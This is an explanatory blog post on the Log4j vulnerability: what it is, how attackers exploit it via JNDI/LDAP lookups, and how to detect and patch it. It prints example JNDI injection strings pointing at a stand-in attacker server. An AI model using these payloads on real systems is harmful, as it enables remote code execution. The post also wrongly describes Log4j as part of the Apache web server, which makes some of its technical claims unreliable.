What is Log4j Vulnerability – How to Detect and Fix it?


In this write-up, you will gain something in or around Log4j vulnerability technical explanation, how to detect it, and how to remediate it. So, without any further ado, let’s get started.


Table of content: 

1. What is Log4j?

2. Log4j vulnerability – Explained

3. How to detect Log4j vulnerability on my system?

4. How attackers exploit Log4j Vulnerability?

5. Apache Log4j vulnerability news

6. The ultimate fix for Log4j vulnerability

1. What is Log4j? 

Log4j is a reliable, and flexible logging framework (APIs) written in Java that allows software developers to log various data, events, and activities within their applications. It is part of the Apache webserver used by various websites for logging activities which can be used for debugging and other purposes. It can be ported to C, C++, Python, Ruby, Eiffel, and more.

If you want to deploy any website and make it accessible to others over the internet, you must set up a Linux/Windows server and install the web application. There should be some mediator which can take the request from the user and get the data from the web application to send it to the end-user. So, the Apache webserver sends the HTTP/HTTPS request and proceeds with further workings. This Apache web server has a small application called Log4j.

Log4j has three main components described as:

  • Loggers: Responsible for getting log data.
  • Appenders: Responsible for publishing log data to various destinations.
  • Layouts: Responsible for formatting log data in different styles.

According to the Indian CERT(Computer Emergency Response Team), various vulnerabilities are reported in the server, which a hacker exploits by performing denial of service(DoS) attacks on the targeted servers. Now let us discuss more about who found the log4j vulnerability and how the log4j vulnerability is exploited.

2. Log4j vulnerability – Explained 

Log4j vulnerability is the weakness present in the Apache Server. Its software utility is being used to record the activity logs of the web server such as error messages, who have illegally accessed the website, and performance logs.

Chen Zhaojun of the Alibaba Security Team has discovered the log4j vulnerability and found it to be present on the software versions 2.0 – 2.14. By exploiting these vulnerabilities, the attackers can gain access to the webserver, can further deploy some malware, can do crypto mining, and install the botnet.

The vulnerability allows unauthentic code execution where any attackers insert code like $ {jndi:ldap://[attacker_URL]} to exploit it. It can be present in IBM, Cloudflare, AWS, Cisco, iCloud, Steam, and VMWare.

3. How to detect log4j vulnerability on my system?

The best approach to detect log4j vulnerability is to use an internal vulnerability scan tool, patch management tool, or a software inventory tool that logs in to each system or application for inventory reasons and compares that with the software known to have this kind of vulnerability.

4. How do attackers exploit Log4j Vulnerability?

The attacker sends a malicious HTTP/HTTPS formatted string to the Apache web server that is further taken by the software. It has the in-built feature known as JNDI which uses LDAP/RMI protocol for lookup. Before we move further, let us first understand these most common terms used in the topic LDAP and JNDI.

What is LDAP –

LDAP stands for Lightweight directory access protocol which is used for accessing and maintaining distributed directory information services. LDAP has various functions such as

storing all of your information and then verifying your identity through the server, and if correct, LDAP returns the information from user accounts {as shown in diagrams}.

How LDAP orks

What is JNDI –

The JNDI stands for Java Naming and Directory Interface. It is an API(application programming interface) that provides naming and directory functions written using the Java language to the applications. It interacts with LDAP and is independent of any specific directory service implementation. Thus a variety of existing and newly deployed directories can be accessed in a common way.

In a nutshell, JNDI is used to request LDAP which Java applications can’t directly interact with.


Now let us discuss how attackers exploit the Log4j Vulnerability?

Log4j allows messages to contain HTTP/HTTPS formatted strings through JNDI to the Apache web server. This information is written in a way that is remotely retrieved by a variety of protocols, including the LDAP. It then looks up the attacker’s server to download any malicious software to verify the input.

When it comes with the following string in a log message:

$ {jndi:ldap://attackerserver/exploit}

This tells the JNDI to ask LDAP at THE “attacker server” for the “exploit” command. If the LDAP server references https://attackerserver/exploit as the response, JNDI automatically requests the “exploit” command from the web server. Now, you can get Remote Code execution(RCE) in an application that was allowing the attacker to remotely execute malicious code.

log4j attack lifecycle

5. Apache Log4j Vulnerability News

The issue: Being used by many websites and applications, the software is used widely to store log activity records on a server. So, the vulnerability discovered allows hackers to

easily take control of the system and steal the information. This exposes the high risk of cybersecurity, which the hackers can exploit using RCE (Remote Code Execution).

As per the report of The Hindu about the security concerts of the software, various proprietary applications used by large companies depend on the Log4j library and are similarly vulnerable.

Crowdstrike, a large cybersecurity technology company, has come up with a solution targeting the Log4j search tool which runs deep scans of the given set of directories matching against a known set of checksums for Log4j libraries, the report added.

6. The Ultimate Fix for Log4j Vulnerability 

What happens is that you may not be aware of whether the software is using Log4j which increases the problems in solving the vulnerability. First, you have to find if your system is having a log4j vulnerability. There are some vulnerability assessment tools to scan your devices to find these vulnerable versions.

  1. Manually coding can also disable the JNDI lookup on the program file for the short term. However, it is not recommended.
  1. You can update the Log4j version with the latest versions to solve the issue. The vendor has released a fix to the problem by updating it for version 2.17.0, if possible.

If updating the library is not possible for some reason, Apache Software Foundation has advised setting the log4j2.formatMsgNoLookups system property. Moreover, one can set the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true. However, it is recommended only for the Log4j versions from 2.10 to 2.14.

To protect the Log4j versions from 2.0 – beta9 to 2.10.0, the recommendations would be to remove the JndiLookup class from the path: zip -q -d log4j-core – *. Jar org / apache / logging / log4j / core / lookup / JndiLookup .class.

  1. Using Firewall rules on Apache web servers is a good method to prevent hackers from attacking the application or website. Attackers are easily able to bypass firewalls but using outgoing firewalls blocks the connections of an attack and provides some sort of security.

Read our next blog The complete guide of The Complete Guide to Botnet Detection and Prevention  

Real-time Best SOC Analyst training by SIEM XPERT – enrol now!